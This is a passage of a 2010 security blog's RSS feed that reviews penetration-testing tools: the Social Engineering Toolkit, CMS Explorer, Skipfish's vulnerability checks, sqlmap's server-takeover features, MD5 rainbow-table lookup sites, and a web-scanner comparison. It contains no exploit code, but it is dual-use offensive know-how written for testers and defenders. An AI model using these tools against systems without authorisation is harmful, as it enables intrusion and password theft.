<p>The guys at <a href="http://www.offensive-security.com/">offensive-security.com</a> have a put some <a href="http://www.offensive-security.com/metasploit-unleashed/">metasploit training online</a> and the guide to the <a href="http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit">Social Engineering Toolkit (SET)</a> is a good step by step tutorial to using the tool and exploiting clients.</p>
<p>Depending on the guidelines of your Pen-Test, attacking the client is often a valuable entry point into the entire network. Frankly once you get the client there is little stopping you from taking the whole network.</p>
<p><a href="http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit">SET Social Engineering Toolkit</a></p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/05/set-social-engineering-toolkit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CMS Explorer</title>
		<link>http://hackertarget.com/2010/04/cms-explorer/</link>
		<comments>http://hackertarget.com/2010/04/cms-explorer/#comments</comments>
		<pubDate>Sun, 25 Apr 2010 03:34:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=563</guid>
		<description><![CDATA[When it comes to security vulnerability assessments against content management systems, it becomes necessary to discover which plugins are being used within the system. For the most popular open source systems (wordpress, drupal, joomla) there are literally thousands of plugins available and many have lets admit it not the best record when it comes to [...]]]></description>
			<content:encoded><![CDATA[<p>When it comes to security vulnerability assessments against content management systems, it becomes necessary to discover which plugins are being used within the system. For the most popular open source systems (wordpress, drupal, joomla) there are literally thousands of plugins available and many have lets admit it not the best record when it comes to secure coding. Just take a look at <a href="http://www.exploit-db.com/">exploit-db.com</a> for the amount of exploits available for these systems and how many of those are due to plugins.</p>
<p>So a new project hosted over at <a href="http://code.google.com/p/cms-explorer/">googlecode</a> is an excellent addition to any vulnerability scanning toolbox.</p>
<p><a href="http://code.google.com/p/cms-explorer/">CMS Explorer</a> searches a site for installed plugins and if you supply an <a href="http://www.osvdb.org">OSVDB.org</a> API key, it will even correlate found plugins with those that are vulnerable.</p>
<blockquote><p>Requirements<br />
    * PERL 5.x<br />
    * Getopt::Long<br />
    * LibWhisker2 (included)<br />
    * OSVDB API key (free for 100 queries per day) </p>
<p>Installation<br />
    * Unpack archive<br />
    * Create the file &#8216;osvdb.key&#8217; in the cms-explorer directory, and put your OSVDB API key on the first line.<br />
    * run ./cms-explorer.pl to ensure no errors are reported </p></blockquote>
<p><a href="http://code.google.com/p/cms-explorer/">CMS-Explorer</a></p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/04/cms-explorer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Web Application Security Tool from Google. Skipfish.</title>
		<link>http://hackertarget.com/2010/04/new-web-application-security-tool-from-google-skipfish/</link>
		<comments>http://hackertarget.com/2010/04/new-web-application-security-tool-from-google-skipfish/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 00:50:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=460</guid>
		<description><![CDATA[Having done some initial testing this new tool is powerful and comprehensive. It blends a number of other tool features into a neat little package. I did some testing on my local LAN and the web server was getting pounded with thousands of requests per second. Your access and error.log is really going to fill [...]]]></description>
			<content:encoded><![CDATA[<p>Having done some initial testing this new tool is powerful and comprehensive. It blends a number of other tool features into a neat little package. I did some testing on my local LAN and the web server was getting pounded with thousands of requests per second. Your access and error.log is really going to fill up with this one, not very subtle.  <img src='http://hackertarget.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<blockquote><p>What is skipfish?</p>
<p>Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments. </p></blockquote>
<p>Go here to download and review the documentation <a href="http://code.google.com/p/skipfish/" taget="_blank">Skipfish</a>.</p>
<blockquote><p>A rough list of the security checks offered by the tool is outlined below.</p>
<p>    * High risk flaws (potentially leading to system compromise):</p>
<p>          o Server-side SQL injection (including blind vectors, numerical parameters).<br />
          o Explicit SQL-like syntax in GET or POST parameters.<br />
          o Server-side shell command injection (including blind vectors).<br />
          o Server-side XML / XPath injection (including blind vectors).<br />
          o Format string vulnerabilities.<br />
          o Integer overflow vulnerabilities.<br />
          o Locations accepting HTTP PUT. </p>
<p>    * Medium risk flaws (potentially leading to data compromise):</p>
<p>          o Stored and reflected XSS vectors in document body (minimal JS XSS support present).<br />
          o Stored and reflected XSS vectors via HTTP redirects.<br />
          o Stored and reflected XSS vectors via HTTP header splitting.<br />
          o Directory traversal (including constrained vectors).<br />
          o Assorted file POIs (server-side sources, configs, etc).<br />
          o Attacker-supplied script and CSS inclusion vectors (stored and reflected).<br />
          o External untrusted script and CSS inclusion vectors.<br />
          o Mixed content problems on script and CSS resources (optional).<br />
          o Incorrect or missing MIME types on renderables.<br />
          o Generic MIME types on renderables.<br />
          o Incorrect or missing charsets on renderables.<br />
          o Conflicting MIME / charset info on renderables.<br />
          o Bad caching directives on cookie setting responses. </p>
<p>    * Low risk issues (limited impact or low specificity):</p>
<p>          o Directory listing bypass vectors.<br />
          o Redirection to attacker-supplied URLs (stored and reflected).<br />
          o Attacker-supplied embedded content (stored and reflected).<br />
          o External untrusted embedded content.<br />
          o Mixed content on non-scriptable subresources (optional).<br />
          o HTTP credentials in URLs.<br />
          o Expired or not-yet-valid SSL certificates.<br />
          o HTML forms with no XSRF protection.<br />
          o Self-signed SSL certificates.<br />
          o SSL certificate host name mismatches.<br />
          o Bad caching directives on less sensitive content. </p>
<p>    * Internal warnings:</p>
<p>          o Failed resource fetch attempts.<br />
          o Exceeded crawl limits.<br />
          o Failed 404 behavior checks.<br />
          o IPS filtering detected.<br />
          o Unexpected response variations.<br />
          o Seemingly misclassified crawl nodes. </p>
<p>    * Non-specific informational entries:</p>
<p>          o General SSL certificate information.<br />
          o Significantly changing HTTP cookies.<br />
          o Changing Server, Via, or X-&#8230; headers.<br />
          o New 404 signatures.<br />
          o Resources that cannot be accessed.<br />
          o Resources requiring HTTP authentication.<br />
          o Broken links.<br />
          o Server errors.<br />
          o All external links not classified otherwise (optional).<br />
          o All external e-mails (optional).<br />
          o All external URL redirectors (optional).<br />
          o Links to unknown protocols.<br />
          o Form fields that could not be autocompleted.<br />
          o Password entry forms (for external brute-force).<br />
          o File upload forms.<br />
          o Other HTML forms (not classified otherwise).<br />
          o Numerical file names (for external brute-force).<br />
          o User-supplied links otherwise rendered on a page.<br />
          o Incorrect or missing MIME type on less significant content.<br />
          o Generic MIME type on less significant content.<br />
          o Incorrect or missing charset on less significant content.<br />
          o Conflicting MIME / charset information on less significant content.<br />
          o OGNL-like parameter passing conventions. </p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/04/new-web-application-security-tool-from-google-skipfish/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Sqlmap 0.8 Released and Rolled out to HackerTarget.com servers</title>
		<link>http://hackertarget.com/2010/04/sqlmap-0-8-released-and-rolled-out-to-hackertarget-com-servers/</link>
		<comments>http://hackertarget.com/2010/04/sqlmap-0-8-released-and-rolled-out-to-hackertarget-com-servers/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 00:41:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Site Updates]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[sqlmap]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=457</guid>
		<description><![CDATA[After discovering the new release of the excellent SQL Injection tool sqlmap I have done some testing and rolled it out to the HackerTarget.com scanning servers.
If you are not familiar with the power of sqlmap head over to the sourceforge site for demo videos and some top notch documentation. Our scanning tools are configured to [...]]]></description>
			<content:encoded><![CDATA[<p>After discovering the new release of the excellent SQL Injection tool <a href="http://sqlmap.sourceforge.net">sqlmap</a> I have done some testing and rolled it out to the <a href="http://www.hackertarget.com">HackerTarget.com</a> scanning servers.</p>
<p>If you are not familiar with the power of sqlmap head over to the <a href="http://sqlmap.sourceforge.net">sourceforge site</a> for demo videos and some top notch <a href="http://sqlmap.sourceforge.net/doc/README.html">documentation</a>. Our scanning tools are configured to discover sql injection holes. However the full power of sqlmap allows you move into the exploitation phase and take over a server &#8211; an excellent tool for penetration testing and showing management how serious sql injection holes can be. New features include integration with <a href="http://www.metasploit.com">Metasploit</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/04/sqlmap-0-8-released-and-rolled-out-to-hackertarget-com-servers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MD5 to Search or Crack?</title>
		<link>http://hackertarget.com/2010/02/md5-to-search-or-crack/</link>
		<comments>http://hackertarget.com/2010/02/md5-to-search-or-crack/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 03:26:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=439</guid>
		<description><![CDATA[MD5 &#8211; while not really crackable, it should be realised that it is just too easy to find simple passwords from the raw hash using Rainbow Tables.
Rainbow tables are massive collections of hashes derived from possible passwords. The rainbow table method simply compares the computed hases against your hash and if you are (un)lucky you [...]]]></description>
			<content:encoded><![CDATA[<p>MD5 &#8211; while not really crackable, it should be realised that it is just too easy to find simple passwords from the raw hash using Rainbow Tables.</p>
<p>Rainbow tables are massive collections of hashes derived from possible passwords. The rainbow table method simply compares the computed hases against your hash and if you are (un)lucky you will get the password.</p>
<p>Here is a sample of MD5 search sites, that will allow you test the strength of your MD5 passwords.</p>
<p><a href="http://gdataonline.com/seekhash.php">http://gdataonline.com/seekhash.php</a><br />
<a href="http://md5.rednoize.com/">http://md5.rednoize.com/</a><br />
<a href="http://www.md5search.de/">http://www.md5search.de/</a></p>
<p>Keep the passwords complicated, and if you are writing web apps, please use a salt!</p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/02/md5-to-search-or-crack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web Scanner Comparison</title>
		<link>http://hackertarget.com/2010/02/web-scanner-comparison/</link>
		<comments>http://hackertarget.com/2010/02/web-scanner-comparison/#comments</comments>
		<pubDate>Tue, 09 Feb 2010 01:41:57 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Site Updates]]></category>
		<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://hackertarget.com/?p=435</guid>
		<description><![CDATA[An interesting report has been released that takes a sample of web application security testing applications and puts them up against each other.
The most notably thing is how much the results vary, and how many vulnerabilities most scanners miss. Clearly using more than one scanner is necessary to be able to compare the results, and [...]]]></description>
			<content:encoded><![CDATA[<p>An interesting <a href="http://ha.ckers.org/files/Accuracy_and_Time_Costs_of_Web_App_Scanners.pdf" target="_blank">report</a> has been released that takes a sample of web application security testing applications and puts them up against each other.</p>
<p>The most notably thing is how much the results vary, and how many vulnerabilities most scanners miss. Clearly using more than one scanner is necessary to be able to compare the results, and nothing can beat testing by skilled security professionals.</p>
<blockquote><p>NTOSpider by NT Objectives came out in the lead with the best overall score of the application scanners tested (which included Acunetix, Appscan, Burp Suite Pro, Hailstorm, WebInspect, and NTOSpider). He also measured things like how long the various scanners take to configure, support and so on &#8211; all important things for companies about to make the big investment. This isn’t all scanners everywhere (notably WhiteHat is missing as is the newest player to the field, NetSparker who incidentally took it upon themselves to add themselves into the report after the fact, and other free web assessment tools, like Nikto etc…), but it’s a great start to a long future of heavily debated research, I’m sure. Love him, or hate him, Larry’s always got interesting research to share!</p></blockquote>
<p><a href="http://ha.ckers.org/blog/20100203/accuracy-and-time-costs-of-web-application-security-scanner-report/" target="_blank">Accuracy and Time Costs of Web Application Security Scanner Report</a></p>
<p>I guess now would be a good time to point out that even if you cough up the money for a commercial scanner or perhaps an online scanning service such as <a href="http://www.qualys.com/" target="_blank">Qualys</a> or <a href="https://www.controlscan.com/index.php" target="_blank">ControlScan</a> getting a second opinion from a service such as ours here at <a href="http://www.hackertarget.com">HackerTarget.com</a> is an excellent way to get a second option.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackertarget.com/2010/02/web-scanner-comparison/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
